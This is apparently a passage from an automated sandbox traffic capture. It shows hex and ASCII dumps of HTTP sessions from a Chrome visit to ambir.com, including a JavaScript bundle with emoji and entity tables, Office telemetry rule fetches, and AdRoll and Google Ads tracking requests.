                                                                                                                                                                                              2024-11-20 20:28:36 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 61 2c 73 29 7b 69 66 28 21 6e 5b 61 5d 29 7b 69 66 28 21 74 5b 61 5d 29 7b 76 61 72 20 6c 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 73 26 26 6c 29 72 65 74 75 72 6e 20 6c 28 61 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 61 2c 21 30 29 3b 76 61 72 20 63 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 61 2b 22 27 22 29 3b 74 68 72 6f 77 20 63 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 63 7d 76 61 72 20 75 3d 6e 5b 61 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 61 5d 5b 30 5d 2e 63 61
                                                                                                                                                                                              Data Ascii: !function e(t,n,r){function o(a,s){if(!n[a]){if(!t[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var u=n[a]={exports:{}};t[a][0].ca
                                                                                                                                                                                              2024-11-20 20:28:36 UTC1INData Raw: 42
                                                                                                                                                                                              Data Ascii: B
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16383INData Raw: 79 74 65 41 72 72 61 79 3d 6c 3b 66 6f 72 28 76 61 72 20 63 3d 5b 5d 2c 75 3d 5b 5d 2c 64 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3f 55 69 6e 74 38 41 72 72 61 79 3a 41 72 72 61 79 2c 66 3d 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 22 2c 70 3d 30 2c 68 3d 66 2e 6c 65 6e 67 74 68 3b 70 3c 68 3b 2b 2b 70 29 63 5b 70 5d 3d 66 5b 70 5d 2c 75 5b 66 2e 63 68 61 72 43 6f 64 65 41 74 28 70 29 5d 3d 70 3b 75 5b 22 2d 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 5d 3d 36 32 2c 75 5b 22 5f 22 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 5d 3d 36 33 7d 2c 7b 7d 5d 2c
                                                                                                                                                                                              Data Ascii: yteArray=l;for(var c=[],u=[],d="undefined"!=typeof Uint8Array?Uint8Array:Array,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",p=0,h=f.length;p<h;++p)c[p]=f[p],u[f.charCodeAt(p)]=p;u["-".charCodeAt(0)]=62,u["_".charCodeAt(0)]=63},{}],
                                                                                                                                                                                              2024-11-20 20:28:36 UTC16383INData Raw: 3d 69 2c 6e 2e 53 6c 6f 77 42 75 66 66 65 72 3d 5f 2c 6e 2e 49 4e 53 50 45 43 54 5f 4d 41 58 5f 42 59 54 45 53 3d 35 30 3b 76 61 72 20 51 3d 32 31 34 37 34 38 33 36 34 37 3b 6e 2e 6b 4d 61 78 4c 65 6e 67 74 68 3d 51 2c 69 2e 54 59 50 45 44 5f 41 52 52 41 59 5f 53 55 50 50 4f 52 54 3d 72 28 29 2c 69 2e 54 59 50 45 44 5f 41 52 52 41 59 5f 53 55 50 50 4f 52 54 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 7c 7c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 69 73 20 62 72 6f 77 73 65 72 20 6c 61 63 6b 73 20 74 79 70 65 64 20 61 72 72 61 79 20 28 55 69 6e 74 38 41 72 72 61 79 29 20 73 75 70 70 6f 72 74 20 77 68 69
                                                                                                                                                                                              Data Ascii: =i,n.SlowBuffer=_,n.INSPECT_MAX_BYTES=50;var Q=2147483647;n.kMaxLength=Q,i.TYPED_ARRAY_SUPPORT=r(),i.TYPED_ARRAY_SUPPORT||"undefined"==typeof console||"function"!=typeof console.error||console.error("This browser lacks typed array (Uint8Array) support whi
                                                                                                                                                                                              2024-11-20 20:28:37 UTC16383INData Raw: 65 33 3a 22 32 36 66 39 2d 31 66 33 66 64 22 2c 62 61 73 6b 65 74 62 61 6c 6c 5f 70 6c 61 79 65 72 5f 74 6f 6e 65 34 3a 22 32 36 66 39 2d 31 66 33 66 65 22 2c 62 61 73 6b 65 74 62 61 6c 6c 5f 70 6c 61 79 65 72 5f 74 6f 6e 65 35 3a 22 32 36 66 39 2d 31 66 33 66 66 22 2c 62 61 74 3a 22 31 66 39 38 37 22 2c 62 61 74 68 3a 22 31 66 36 63 30 22 2c 62 61 74 68 5f 74 6f 6e 65 31 3a 22 31 66 36 63 30 2d 31 66 33 66 62 22 2c 62 61 74 68 5f 74 6f 6e 65 32 3a 22 31 66 36 63 30 2d 31 66 33 66 63 22 2c 62 61 74 68 5f 74 6f 6e 65 33 3a 22 31 66 36 63 30 2d 31 66 33 66 64 22 2c 62 61 74 68 5f 74 6f 6e 65 34 3a 22 31 66 36 63 30 2d 31 66 33 66 65 22 2c 62 61 74 68 5f 74 6f 6e 65 35 3a 22 31 66 36 63 30 2d 31 66 33 66 66 22 2c 62 61 74 68 74 75 62 3a 22 31 66 36 63 31 22
                                                                                                                                                                                              Data Ascii: e3:"26f9-1f3fd",basketball_player_tone4:"26f9-1f3fe",basketball_player_tone5:"26f9-1f3ff",bat:"1f987",bath:"1f6c0",bath_tone1:"1f6c0-1f3fb",bath_tone2:"1f6c0-1f3fc",bath_tone3:"1f6c0-1f3fd",bath_tone4:"1f6c0-1f3fe",bath_tone5:"1f6c0-1f3ff",bathtub:"1f6c1"
                                                                                                                                                                                              2024-11-20 20:28:37 UTC3INData Raw: 73 69 67
                                                                                                                                                                                              Data Ascii: sig
                                                                                                                                                                                              2024-11-20 20:28:37 UTC16383INData Raw: 6e 3a 22 32 37 39 37 22 2c 68 65 61 76 79 5f 64 6f 6c 6c 61 72 5f 73 69 67 6e 3a 22 31 66 34 62 32 22 2c 68 65 61 76 79 5f 65 78 63 6c 61 6d 61 74 69 6f 6e 5f 6d 61 72 6b 3a 22 32 37 35 37 22 2c 68 65 61 76 79 5f 6d 69 6e 75 73 5f 73 69 67 6e 3a 22 32 37 39 36 22 2c 68 65 61 76 79 5f 6d 75 6c 74 69 70 6c 69 63 61 74 69 6f 6e 5f 78 3a 22 32 37 31 36 22 2c 68 65 61 76 79 5f 70 6c 75 73 5f 73 69 67 6e 3a 22 32 37 39 35 22 2c 68 65 6c 69 63 6f 70 74 65 72 3a 22 31 66 36 38 31 22 2c 68 65 6c 6d 65 74 5f 77 69 74 68 5f 63 72 6f 73 73 3a 22 32 36 64 31 22 2c 68 65 72 62 3a 22 31 66 33 33 66 22 2c 68 69 62 69 73 63 75 73 3a 22 31 66 33 33 61 22 2c 68 69 67 68 5f 62 72 69 67 68 74 6e 65 73 73 3a 22 31 66 35 30 36 22 2c 68 69 67 68 5f 68 65 65 6c 3a 22 31 66 34 36
                                                                                                                                                                                              Data Ascii: n:"2797",heavy_dollar_sign:"1f4b2",heavy_exclamation_mark:"2757",heavy_minus_sign:"2796",heavy_multiplication_x:"2716",heavy_plus_sign:"2795",helicopter:"1f681",helmet_with_cross:"26d1",herb:"1f33f",hibiscus:"1f33a",high_brightness:"1f506",high_heel:"1f46
                                                                                                                                                                                              2024-11-20 20:28:37 UTC16383INData Raw: 22 2c 73 6d 69 6c 65 3a 22 31 66 36 30 34 22 2c 73 6d 69 6c 65 5f 63 61 74 3a 22 31 66 36 33 38 22 2c 73 6d 69 6c 65 79 3a 22 31 66 36 30 33 22 2c 73 6d 69 6c 65 79 5f 63 61 74 3a 22 31 66 36 33 61 22 2c 73 6d 69 6c 69 6e 67 5f 69 6d 70 3a 22 31 66 36 30 38 22 2c 73 6d 69 72 6b 3a 22 31 66 36 30 66 22 2c 73 6d 69 72 6b 5f 63 61 74 3a 22 31 66 36 33 63 22 2c 73 6d 6f 6b 69 6e 67 3a 22 31 66 36 61 63 22 2c 73 6e 61 69 6c 3a 22 31 66 34 30 63 22 2c 73 6e 61 6b 65 3a 22 31 66 34 30 64 22 2c 73 6e 65 65 7a 69 6e 67 5f 66 61 63 65 3a 22 31 66 39 32 37 22 2c 73 6e 6f 77 62 6f 61 72 64 65 72 3a 22 31 66 33 63 32 22 2c 73 6e 6f 77 66 6c 61 6b 65 3a 22 32 37 34 34 22 2c 73 6e 6f 77 6d 61 6e 3a 22 32 36 63 34 22 2c 73 6e 6f 77 6d 61 6e 32 3a 22 32 36 30 33 22 2c 73
                                                                                                                                                                                              Data Ascii: ",smile:"1f604",smile_cat:"1f638",smiley:"1f603",smiley_cat:"1f63a",smiling_imp:"1f608",smirk:"1f60f",smirk_cat:"1f63c",smoking:"1f6ac",snail:"1f40c",snake:"1f40d",sneezing_face:"1f927",snowboarder:"1f3c2",snowflake:"2744",snowman:"26c4",snowman2:"2603",s
                                                                                                                                                                                              2024-11-20 20:28:37 UTC16383INData Raw: 6c 53 71 75 61 72 65 3a 22 e2 96 aa 22 2c 66 6a 6c 69 67 3a 22 66 6a 22 2c 66 6c 61 74 3a 22 e2 99 ad 22 2c 66 6c 6c 69 67 3a 22 ef ac 82 22 2c 66 6c 74 6e 73 3a 22 e2 96 b1 22 2c 66 6e 6f 66 3a 22 c6 92 22 2c 46 6f 70 66 3a 22 f0 9d 94 bd 22 2c 66 6f 70 66 3a 22 f0 9d 95 97 22 2c 66 6f 72 61 6c 6c 3a 22 e2 88 80 22 2c 46 6f 72 41 6c 6c 3a 22 e2 88 80 22 2c 66 6f 72 6b 3a 22 e2 8b 94 22 2c 66 6f 72 6b 76 3a 22 e2 ab 99 22 2c 46 6f 75 72 69 65 72 74 72 66 3a 22 e2 84 b1 22 2c 66 70 61 72 74 69 6e 74 3a 22 e2 a8 8d 22 2c 66 72 61 63 31 32 3a 22 c2 bd 22 2c 66 72 61 63 31 33 3a 22 e2 85 93 22 2c 66 72 61 63 31 34 3a 22 c2 bc 22 2c 66 72 61 63 31 35 3a 22 e2 85 95 22 2c 66 72 61 63 31 36 3a 22 e2 85 99 22 2c 66 72 61 63 31 38 3a 22 e2 85 9b 22 2c 66 72 61 63
                                                                                                                                                                                              Data Ascii: lSquare:"",fjlig:"fj",flat:"",fllig:"",fltns:"",fnof:"",Fopf:"",fopf:"",forall:"",ForAll:"",fork:"",forkv:"",Fouriertrf:"",fpartint:"",frac12:"",frac13:"",frac14:"",frac15:"",frac16:"",frac18:"",frac
                                                                                                                                                                                              2024-11-20 20:28:37 UTC16383INData Raw: 45 3a 22 e2 ab 85 22 2c 73 75 62 65 3a 22 e2 8a 86 22 2c 73 75 62 65 64 6f 74 3a 22 e2 ab 83 22 2c 73 75 62 6d 75 6c 74 3a 22 e2 ab 81 22 2c 73 75 62 6e 45 3a 22 e2 ab 8b 22 2c 73 75 62 6e 65 3a 22 e2 8a 8a 22 2c 73 75 62 70 6c 75 73 3a 22 e2 aa bf 22 2c 73 75 62 72 61 72 72 3a 22 e2 a5 b9 22 2c 73 75 62 73 65 74 3a 22 e2 8a 82 22 2c 53 75 62 73 65 74 3a 22 e2 8b 90 22 2c 73 75 62 73 65 74 65 71 3a 22 e2 8a 86 22 2c 73 75 62 73 65 74 65 71 71 3a 22 e2 ab 85 22 2c 53 75 62 73 65 74 45 71 75 61 6c 3a 22 e2 8a 86 22 2c 73 75 62 73 65 74 6e 65 71 3a 22 e2 8a 8a 22 2c 73 75 62 73 65 74 6e 65 71 71 3a 22 e2 ab 8b 22 2c 73 75 62 73 69 6d 3a 22 e2 ab 87 22 2c 73 75 62 73 75 62 3a 22 e2 ab 95 22 2c 73 75 62 73 75 70 3a 22 e2 ab 93 22 2c 73 75 63 63 61 70 70 72 6f
                                                                                                                                                                                              Data Ascii: E:"",sube:"",subedot:"",submult:"",subnE:"",subne:"",subplus:"",subrarr:"",subset:"",Subset:"",subseteq:"",subseteqq:"",SubsetEqual:"",subsetneq:"",subsetneqq:"",subsim:"",subsub:"",subsup:"",succappro


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              145192.168.2.54989213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:36 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                              x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202836Z-185f5d8b95c5lcmhhC1NYCsnsw0000000awg0000000024mq
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:36 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              146192.168.2.54988652.220.250.1824431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:36 UTC623OUTGET /consent/check/GXXT3DJJNNBKHGBC62RAND?flg=1&pv=74305401830.21593&arrfrr=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&_s=a60e6a62d132d36d1465029b174eaecd&_b=2 HTTP/1.1
                                                                                                                                                                                              Host: d.adroll.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513
                                                                                                                                                                                              2024-11-20 20:28:37 UTC1047INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:36 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Content-Length: 582
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                              P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Set-Cookie: __adroll=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:36 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:36 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=d.adroll.com
                                                                                                                                                                                              Set-Cookie: receive-cookie-deprecation=1; Version=1; Expires=Sat, 20-Dec-2025 20:28:36 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Partitioned; Domain=adroll.com
                                                                                                                                                                                              Set-Cookie: __adroll_shared=16b1e49ed627599a8c527b960adbb83e-a_1732134513; Version=1; Expires=Sat, 20-Dec-2025 20:28:36 GMT; Max-Age=34128000; Path=/; HttpOnly; SameSite=None; Secure; Domain=adroll.com
                                                                                                                                                                                              2024-11-20 20:28:37 UTC582INData Raw: 77 69 6e 64 6f 77 2e 61 64 72 6f 6c 6c 5f 65 78 70 5f 6c 69 73 74 20 3d 20 5b 5d 3b 20 77 69 6e 64 6f 77 2e 5f 5f 61 64 72 6f 6c 6c 5f 75 72 6c 5f 63 61 74 65 67 6f 72 79 20 3d 20 22 70 72 6f 64 75 63 74 5f 70 61 67 65 22 3b 20 5f 5f 61 64 72 6f 6c 6c 2e 73 65 74 5f 63 6f 6e 73 65 6e 74 28 74 72 75 65 2c 20 66 61 6c 73 65 2c 20 66 61 6c 73 65 2c 20 22 55 53 22 2c 20 22 55 53 22 2c 20 7b 22 61 72 63 6f 6e 73 65 6e 74 22 3a 6e 75 6c 6c 2c 22 65 75 63 6f 6e 73 65 6e 74 22 3a 6e 75 6c 6c 2c 22 70 75 72 70 6f 73 65 73 22 3a 6e 75 6c 6c 2c 22 65 75 63 6f 6f 6b 69 65 22 3a 6e 75 6c 6c 2c 22 62 61 6e 6e 65 72 22 3a 22 62 61 6e 6e 65 72 5f 64 65 63 6c 69 6e 65 64 22 2c 22 69 70 67 65 6f 22 3a 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65
                                                                                                                                                                                              Data Ascii: window.adroll_exp_list = []; window.__adroll_url_category = "product_page"; __adroll.set_consent(true, false, false, "US", "US", {"arconsent":null,"euconsent":null,"purposes":null,"eucookie":null,"banner":"banner_declined","ipgeo":{"country_code":"US","re


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              147192.168.2.549896172.217.17.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:37 UTC1131OUTGET /pagead/viewthroughconversion/1070729751/?random=1732134510409&cv=11&fst=1732134510409&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                              Host: googleads.g.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
                                                                                                                                                                                              2024-11-20 20:28:38 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:37 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:38 UTC687INData Raw: 31 32 62 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 61 2c 63 29 7b 69 66 28 62 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 62 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 62 3b 62 5b 61 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 62 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                              Data Ascii: 12ba(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&global
                                                                                                                                                                                              2024-11-20 20:28:38 UTC1390INData Raw: 22 2e 22 29 3b 62 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 64 5b 30 5d 2c 67 3b 21 62 26 26 65 20 69 6e 20 71 3f 67 3d 71 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 6e 26 26 63 3d 3d 3d 22 65 73 36 22 3f 67 5b 64 5d 3a 6e 75 6c 6c 3b 61 3d 61 28 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 62 3f 68 28 71 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 61 7d 29 3a 61 21 3d 3d 63 26 26 28 74 5b 64 5d 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 4d 61 74 68 2e 72 61
                                                                                                                                                                                              Data Ascii: ".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.ra
                                                                                                                                                                                              2024-11-20 20:28:38 UTC1390INData Raw: 31 29 3b 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 3b 61 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 7d 3b 61 2e 73 72 63 3d 62 7d 3b 76 61 72 20 46 2c 47 3b 61 3a 7b 66 6f 72 28 76 61 72 20 48 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 49 3d 78 2c 4a 3d 30 3b 4a 3c 48 2e 6c 65 6e 67 74 68 3b 4a 2b 2b 29 69 66 28 49 3d 49 5b 48 5b 4a 5d 5d 2c 49 3d 3d 6e 75 6c 6c 29 7b 47 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 47 3d 49 7d 76 61 72 20 4b 3d 47 26 26 47 5b 36 31 30 34 30 31 33 30 31 5d 3b 46 3d 4b 21 3d 6e 75 6c 6c 3f 4b 3a 21 31 3b 76 61 72 20 4c 2c 4d 3d 78 2e 6e 61 76 69 67 61 74 6f 72 3b 4c 3d 4d 3f 4d 2e 75 73 65 72 41
                                                                                                                                                                                              Data Ascii: 1);a.onload=function(){a.onload=null};a.onerror=function(){a.onerror=null};a.src=b};var F,G;a:{for(var H=["CLOSURE_FLAGS"],I=x,J=0;J<H.length;J++)if(I=I[H[J]],I==null){G=null;break a}G=I}var K=G&&G[610401301];F=K!=null?K:!1;var L,M=x.navigator;L=M?M.userA
                                                                                                                                                                                              2024-11-20 20:28:38 UTC1335INData Raw: 73 72 63 7c 7c 28 70 3d 72 29 3b 70 7c 7c 28 70 3d 6e 65 77 20 49 6d 61 67 65 2c 64 26 26 64 5b 66 2e 67 5d 26 26 28 70 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 45 28 64 5b 6c 2e 67 5d 29 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 70 2e 6f 6e 6c 6f 61 64 3d 65 3b 70 2e 73 72 63 3d 63 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 56 3d 5b 22 73 73 5f 22 5d 2c 57 3d 73 7c 7c 78 3b 20 56 5b 30 5d 69 6e 20 57 7c 7c 74 79 70 65 6f 66 20 57 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 57 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 56 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 58 3b 56 2e 6c 65 6e 67 74 68 26 26 28 58 3d 56 2e 73 68 69 66 74 28 29 29 3b
